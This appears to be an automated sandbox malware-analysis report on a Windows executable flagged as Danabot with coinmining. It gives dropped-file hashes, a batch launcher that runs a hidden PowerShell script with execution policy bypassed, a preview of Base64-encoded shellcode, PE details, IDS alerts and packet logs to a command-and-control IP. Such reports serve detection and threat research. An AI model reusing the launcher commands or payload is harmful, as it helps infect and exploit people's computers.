File Type:	DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	171
Entropy (8bit):	5.154566944260334
Encrypted:	false
SSDEEP:	3:BKDDCMN2RsSLKHohLcygSSJJFIf9oM3KbQqPJH0cVERSouOt+kiEaKC5SufyM1Ky:SWK2t3h6B81R3KbQO0cqNwknaZ5SuH1b
MD5:	CE6C7A17D50542ACB52ACF97EB321E94
SHA1:	831A250BD72947546E534568A07E3846C6D4DFEB
SHA-256:	A49873D4235EE0892968F9453708B0D158A4980E4400C30B8E16FAC88E96C3FF
SHA-512:	52046328E18E609F3F5E34823747DE5426BC52A3064BEBBAA1A0D94318BB69D8E4350D2BBCC2880D4D8EAAD0EC0C7C9318D28C865CDD5DD150EFC2D10F69D41F
Malicious:	true
Preview:	.@echo off..timeout /t 30 /nobreak >nul..powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1"..

C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	11903058
Entropy (8bit):	6.001286550602484
Encrypted:	false
SSDEEP:	49152:ouEYV56Cuy/XQxTwsUcCnFapQCYTF7j1D2Srat2EO9MsskNirT2sh7Wv0yCLfcvh:r
MD5:	B6D611AF4BEA8EAAA639BBF024EB0E2D
SHA1:	0B1205546FD80407D85C9BFBED5FF69D00645744
SHA-256:	8CD3BF95CEDCF3469D0044976C66CBF22CD2FECF21AE4F94986D7211D6BA9A2B
SHA-512:	D8A4EC5BD986884959DB3EDFD48E2BF4C70EAD436F81EAB73B104AA0FF0F5DADFB6227CB2DAB1F979F0DBB3AAFBC1889ED571FB6E9444A09AE984B789314463D
Malicious:	true
Preview:	$Base64Shellcode = "6MD1hwDA9YcAMPEXpBBNkUDFfYRVQ3yvInI8M4ntArL8Wl9/MsdctFgAAAAA1kkIlrOpS+cPj2a2EVOQ05KNTYfQ4AZSALPZO0MFCDzNkh+QQPV7z+9gp/qtd66s8jhY0dN5HFsabYXl2lg1REifKK1HETr37UZTWesfJVAVfXlbEG1v5HpNvQ0JrANX7uoPeD6UvxsrKFTOLLOBcwmp+jMqSjOCc+Ffoy9S5upBheclDaAoW9B95yX35U/Od7YFyDOf45PGumgNadzuIdAiJ3VtcMM+pKc06MyHqDc0vw5WryQbnoDapNfe8vSW1hFDmnA0Ifbz2MozCzG4WVcNRBl1Zu8NNpUTMjHE6DqO8OhB8vbEmjR5j9iSw1JE0+VGDd3gbaPMMZ/2/BEvE7PSVB2Egc15AzGIRO1ycscdHgc53oIqCierNft0tge6jHxIznGqwS6tN1jIyGRlNS1DKsqwDkBdjUmIlWvEVSZHNQ2wTuzURXYPh5Oiqayot+XSITp+rMQgbjyufsBzFAgqAEZwt+rEUtZcvN8fvLNyUGn7npCzGEQyE9d1VKttlHE6r3I9qyvI50jaee64LDR2mOUVjn9b77vlNyOcoVGLPSFJWRdZ+UN9/0Na3Esn5vzzdTQPSVxbWVC7zVfyFVTwTZwo1vay4lZVBgs3jdG5lHobkzevh6+zYyf5luHi8mK+oBiSr/sv/N4sPO8PJCWvfCpIA2fh/Jv2SRW9754AAAAAAAAAAAEAAAADAAAAAAAAABkRvFSmEhLro5cn+JFulhQts0r6aEDUmLx8PvVGAEo4oH+0z/3YqZPt2EoeCJxNTnYYhpoznR2YcS19oj8NaFjXdIT/izGoglFFvN7LkUep2ocDSHaeyffSr83KrIWM0F+cBz5yQFNZI7ApliUsRw2Mr2gXmhg+dy/EHPEHzmS5q4YtRVNiBwpiEu1p0jPIAK0pNzzYp3vTBZhOwIQA

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

\Device\Null

Download File

Process:	C:\Windows\System32\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	172
Entropy (8bit):	3.8842159555406113
Encrypted:	false
SSDEEP:	3:hYFRZARcWmFsFJQZ/ctXvY/4to/9uF8cttEfYhnQUqg2Htyst3g4t32vov:hYFRamFSQZ0lv5y/9JctESnQUq3tyMXZ
MD5:	B44FC16E07912C24524F74A8D3C9BCED
SHA1:	CCBA90D10D32BFF18221183C88146B378011CC3B
SHA-256:	FA51D90457861D7169034A0D4122B3AFDA2B4C07E157A4C18AF06D833C96ED2A
SHA-512:	1B9F0DD3387FDD1324828AA7CC94A98EC0344A5CAF1EDFFAAF7C0F98F134B09A4DCFD440E9374B0D3C80E099DFE43DABD838B0BE34C395C2F64C9334AE569516
Malicious:	false
Preview:	..Waiting for 30 seconds, press CTRL+C to quit .....29..28..27..26..25..24..23..22..21..20..19..18..17..16..15..14..13..12..11..10.. 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.456413272937089
TrID:	Win64 Executable GUI (202006/5) 92.64% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% VXD Driver (31/22) 0.01%
File name:	yjYJ8QncaF.exe
File size:	122'880 bytes
MD5:	5b3ed060facb9d57d8d0539084686870
SHA1:	9cae8c44e44605d02902c29519ea4700b4906c76
SHA256:	7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512:	6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a
SSDEEP:	3072:EV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPQT:pt5hBPi0BW69hd1MMdxPe9N9uA069TB6
TLSH:	13C32756B2E01198DBF581F6D9920746EB7070311B15A3DB6BB863B31B2B8C69F3D390
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...E.@]........../....2.b...z.................@.............................0.............................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x140001000
Entrypoint Section:	.code
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics:
Time Stamp:	0x5D400545 [Tue Jul 30 08:52:21 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7182b1ea6f92adbf459a2c65d8d4dd9e

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec ecx
mov eax, 00000160h
dec eax
xor edx, edx
dec eax
mov ecx, 40020444h
add dword ptr [eax], eax
add byte ptr [eax], al
call 00007F0544DA3ED8h
dec eax
xor ecx, ecx
call 00007F0544DA3ED6h
dec eax
mov dword ptr [0001F420h], eax
dec ebp
xor eax, eax
dec eax
mov edx, 00001000h
dec eax
xor ecx, ecx
call 00007F0544DA3EC3h
dec eax
mov dword ptr [0001F3FFh], eax
dec eax
mov eax, 4001F090h
add dword ptr [eax], eax
add byte ptr [eax], al
dec eax
mov dword ptr [0001F43Eh], eax
call 00007F0544DAEEFAh
call 00007F0544DAEB89h
call 00007F0544DAACB0h
call 00007F0544DAA2A3h
call 00007F0544DA9B32h
call 00007F0544DA9801h
call 00007F0544DA8EF8h
call 00007F0544DA83AFh
call 00007F0544DA3FD2h
call 00007F0544DACE95h
call 00007F0544DAB6F4h
dec eax
mov edx, 4001F032h
add dword ptr [eax], eax
add byte ptr [eax], al
dec eax
lea ecx, dword ptr [0001F3C6h]
call 00007F0544DAEF22h
dec eax
mov ecx, FFFFFFF5h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f198	0xc8	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x22000	0x5e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1d000	0x10d4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1f6a8	0x448	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.code	0x1000	0x5a99	0x5c00	bf90681e6a2fc3ae2cafaa536804f308	False	0.3649796195652174	data	5.470810722545147	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.text	0x7000	0x105b5	0x10600	8a1a401c4bd106ea802d83f827d2ddd2	False	0.4909798425572519	data	6.359859898514709	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x18000	0x4b3d	0x4c00	546e073a6443174d5e09f21ab6d487ce	False	0.6635999177631579	VAX-order 68k Blit mpx/mux executable	6.6666895682624485	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x1d000	0x10d4	0x1200	e81bd35fde0f70c926459e823327da76	False	0.4683159722222222	data	4.881026996790752	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1f000	0x2318	0x1600	b8a0c84b8ae6315cdfe8c75a3ff58c0a	False	0.3283025568181818	data	4.297632525974567	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x22000	0x5e8	0x600	cbf4a4584e77982322f87d7f244a6699	False	0.6588541666666666	data	5.930170997889053	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_RCDATA	0x2221c	0x144	data	1.0339506172839505
RT_RCDATA	0x22360	0xe	zlib compressed data	1.5714285714285714
RT_RCDATA	0x22370	0x1	very short file (no magic)	9.0
RT_RCDATA	0x22374	0x9	International EBCDIC text, with no line terminators, with overstriking	1.8888888888888888
RT_MANIFEST	0x22380	0x267	XML 1.0 document, ASCII text	0.5284552845528455

Imports

DLL	Import
msvcrt.dll	memset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
KERNEL32.dll	GetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetShortPathNameW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetProcAddress, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, RtlLookupFunctionEntry, RtlVirtualUnwind, RemoveVectoredExceptionHandler, AddVectoredExceptionHandler, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
SHELL32.DLL	ShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
WINMM.DLL	timeBeginPeriod
OLE32.DLL	CoInitialize, CoTaskMemFree
SHLWAPI.DLL	PathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW
USER32.DLL	CharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, GetWindowLongPtrW, GetWindowTextLengthW, GetWindowTextW, EnableWindow, DestroyWindow, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, GetSystemMetrics, CreateWindowExW, SetWindowLongPtrW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
GDI32.DLL	GetStockObject
COMCTL32.DLL	InitCommonControlsEx

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-06T08:09:11.368287+0100	2826930	ETPRO COINMINER XMR CoinMiner Usage	2	192.168.2.4	49862	80.240.16.67	443	TCP
2025-03-06T08:09:12.012623+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.4	49733	45.144.212.77	16000	TCP
2025-03-06T08:09:12.012623+0100	2854648	ETPRO MALWARE Win32/Danabot CnC Activity (GET)	1	192.168.2.4	49733	45.144.212.77	16000	TCP
2025-03-06T08:09:59.130589+0100	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	2	192.168.2.4	56035	1.1.1.1	53	UDP
2025-03-06T08:10:45.850614+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49840	204.79.197.203	443	TCP
2025-03-06T08:11:00.849298+0100	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	2	192.168.2.4	56610	1.1.1.1	53	UDP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 6, 2025 08:09:11.368287086 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:11.373373985 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:11.373470068 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:11.376442909 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:11.381546974 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.012528896 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.012543917 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.012563944 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.012577057 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.012587070 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.012599945 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.012620926 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.012623072 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.012624025 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.012630939 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.012641907 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.012654066 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.012681961 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.012681961 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.012718916 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.017662048 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.017719030 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.017724991 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.017800093 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.017828941 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.017872095 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.018057108 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.061824083 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.103512049 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.103528023 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.103539944 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.103578091 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.103579998 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.103590965 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.103602886 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.103619099 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.103652000 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.103936911 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.103949070 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.103960037 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.103986025 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.104062080 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.104074001 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.104103088 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.104665995 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.104680061 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.104711056 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.104980946 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.104991913 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.105005980 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.105019093 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.105021000 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.105051041 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.105478048 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.105496883 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.105509043 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.105520964 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.105560064 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.105681896 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.105699062 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.105714083 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.105741024 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.106421947 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.106462002 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.194092035 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.194106102 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.194117069 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.194196939 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.194201946 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.194245100 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.194312096 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.194323063 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.194335938 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.194348097 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.194358110 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.194360018 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.194389105 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.194890022 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.194901943 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.194915056 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.194943905 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.194983959 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.194986105 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.194998026 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.195008993 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.195020914 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.195044994 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.195066929 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.195694923 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.195705891 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.195729017 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.195739985 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.195743084 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.195751905 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.195764065 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.195777893 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.195786953 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.195810080 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.195838928 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.195884943 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.196506023 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.196551085 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.196562052 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.196603060 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.196703911 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.196716070 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.196727991 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.196739912 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.196753025 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.196753025 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.196774960 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.196806908 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.197464943 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.197489023 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.197500944 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.197527885 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.197575092 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.197587967 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.197621107 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.197664976 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.197675943 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.197686911 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.197740078 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.198451042 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.198465109 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.198487043 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.198498964 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.198512077 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.198554993 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.240777016 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.240806103 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.240849972 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.285348892 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.285372019 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.285384893 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.285428047 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.285446882 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.285485029 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.285496950 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.285531044 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.285537004 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.285542965 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.285586119 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.285603046 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.285654068 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.285665989 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.285702944 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.285726070 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.285768986 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.285850048 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.285861969 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.285872936 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.285885096 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.285917044 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.285931110 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.286003113 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.286015034 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.286026001 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.286037922 CET	16000	49733	45.144.212.77	192.168.2.4
